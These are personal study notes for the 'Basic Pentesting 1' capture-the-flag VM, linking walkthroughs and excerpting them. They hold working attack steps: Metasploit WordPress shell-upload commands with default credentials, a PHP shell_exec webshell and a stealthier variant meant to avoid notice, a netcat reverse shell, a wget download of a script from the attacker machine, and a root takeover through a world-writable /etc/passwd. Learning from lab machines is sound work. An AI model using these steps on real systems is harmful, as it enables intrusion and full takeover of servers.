VM 13 : Basic Pentest 1 csec

Notes:

Walkthru:
1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [w/metasploit using Wordpresst]
2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/[w/metasploit using ftp]

3. https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [by uploading php-reverse-shell in wordpress]

4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB]

5. https://cowsayroot.com/walkthrough-basic-pentesting-1/ [Wpscan, ftp metasploit vulnerability, phpbash]

6. http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/  [use msfvenom to create  to create php shell to be uploaded in Wordpress]
7. https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP]

Notes:
 Ports
- 21...ProFTPD 1.3.3c
- 22 openSSH 7.2p2 ubuntu  4ubuntu2.4
- 80 Apache httpd 2.4.18
- ran nikto and found Wordpress folder
- need to add an entry in /etc/host to make the Wordpress blog work correctly.

NOTE: When navigating to the folder, the web page looks deformed. It seems like the vulnhub image creator has set his http-redirs to include the hostname vtcsec e.g vtcsec/secret/ instead of just appending /secret/. To fix, execute this command, be sure to change the IP to the IP of the vulnerable machine found earlier:

root@kali:~# echo "10.10.10.2 vtcsec" >> /etc/hosts

- able to login to the blog with the default pwd
- We are going to upload a php reverse shell in Wordpress.( Webshell.  In order to avoid causing any problems with the site (and, in theory, avoid instant detection), we will edit a page in a theme that is not in use. Question is, where is this file located?  Dirb gives us a hint.  Dirb found a directory labeled /secret/wp-content/themes/.  We know the name of our theme, and the name of our page, so it’s fairly simple to guess the rest of the URL:  http://vtcsec/secret/wp-content/themes/twentyfifteen/404.php )
- Now in WordPress, navigate to Appearance -> Editor and select the 404.php Template. 

- Now paste your code in here so it looks something like this:

Edit the yellow marked lines

-Edit the lines marked in yellow so the IP points to your attacking computer and choose a port.

- nc -lvp 443 on Kali and open the php reverse shell page 

Walkthru:
===============
https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [w/metasploit using Wordpress]

msf > use unix/webapp/wp_admin_shell_upload

msf exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.10.10.2
rhost => 10.10.10.2
msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit

If you’ve set the variables correctly, you should now be presented with a meterpreter shell.  didnt work initially but I used hostname (vtcsec) in rhost instead of ip and it worked. Now it’s time to drop into a system command shell, spawn bash using python, and start checking for potential ways to achieve privilege escalation.

meterpreter > shell

python -c 'import pty; pty.spawn("/bin/bash")'

www-data@vtcsec:/var/www/html/secret/wp-content/plugins/fCMAeDaBed$ 

Checking for privilege escalation possibilities is easy using unix-privesc-check. To transfer the script to the machine, I downloaded it to /var/www/html on my pentest machine and started apache. Then trasfered it with wget into the /tmp directory, as this typically is write-able for any linux user.

root@kali:~# service apache2 start

www-data@vtcsec:/tmp$ wget 10.10.10.1/unix-privesc-check
wget 10.10.10.1/unix-privesc-check
--2018-01-06 19:00:20--  http://10.10.10.1/unix-privesc-check
Connecting to 10.10.10.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K)
Saving to: 'unix-privesc-check'

unix-privesc-check  100%[===================>]  35.94K  --.-KB/s    in 0.002s

2018-01-06 19:00:20 (17.7 MB/s) - 'unix-privesc-check' saved [36801/36801]

Marking it as executable, running it, and greping for anything vulnerable, we find this:

WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd

Editing this file should let us either disable or change the root password, the xindicating the password is in /etc/shadow, which we do not have access to. Turns out you can still set passwords in /etc/passwd, make sure to generate a hash of the password. Removing the x should remove the need for a password, but it doesn’t work in this case.

[/etc/passwd]
root:x:0:0:root:/root:/bin/bash

root@kali:~# openssl passwd -1
Password: 
Verifying - Password: 
$1$niFfFSe9$S4YxFSOzT2HpK5bnr7jtk/

[/etc/passwd]
root:$1$niFfFSe9$S4YxFSOzT2HpK5bnr7jtk/:0:0:root:/root:/bin/bash

After that, voilà! Root access

$ su - root
Password: test123

root@vtcsec:~# 

-------------

5. https://cowsayroot.com/walkthrough-basic-pentesting-1/ [Wpscan, ftp metasploit vulnerability, phpbash which emulates a BASH environment directly in your browser, making it for useful. Good one, includes creating shell using msfvenom, uploading to victim and using reverseshell but it didnt work. I can upload it to victim using webshell but was unable to run and get reverse shell]

-------------

7. https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP]

To turn this vector into an RCE attack, the following code can be injected in the index.php file (or any other file ending in .php, as it has to go through the php interpreter and output the result of a code execution instead of just displaying html):

<?php echo shell_exec($_GET['cmd']); ?>

Injecting PHP code into wordpress – wordpress template editor

  By just openning the web page any output won’t be seen due to the way the wordpress styles are structured, but looking at the source code shows the following output:

Achieving RCE webshell using the wordpress template editor

In order to make this neater, the above code can be changed to the following:

if (isset($_GET['cmd'])) {
 echo shell_exec($_GET['cmd']);
 exit;
}

This way only the command output of the command passed via the “cmd” GET variable will be shown, in case it was set, this way keeping the normal web applications’ functions and ensuring they won’t be interrupted to avoid bringing any suspicion by visitors.  

Making the RCE injected code neater using the wordpress template editor

Bringing the RCE into a normal shell After getting this far, the next step would be to bring the webshell into normal remote shell. This can be done in several ways, by either using the msfvenom tool in Kali, download and execute it on the target, or by using any existing tools residing on the box, like nc. In this case I’ll show the most straight-forward way, using nc. The first thing you want to make sure is that you have the necessary tools for this: So there’s a netcat binary on the target server, which can be used to initiate a reverse shell back to us (this seems to be the bsd version of netcan, which is missing the -e command, so we have to use a backpipe): The command that’s used above, as well as other useful, commonly used commands can be found in my personal cheatsheet – look for “netcat backpipe”  

Getting a shell using the bsd version of nc

For more information on what  netcat backpipe is and how to initiate a netcat session without the -e option look at the SANS Penetration Testing article Phase 4: Privilege Escalation Privilege escalation is occasionally a complicated process and is out of scope of this article to review it in details. A must read is g0tmi1k‘s Basic Linux Privilege Escalation In this case, the /etc/passwd and the /etc/shadow files are set with insecure permissions – as shown below the /etc/passwd file is writable by anyone, and the /etc/shadow file can be read by any user:  

Insecure permissions on /etc/passwd and /etc/shadow files

-------------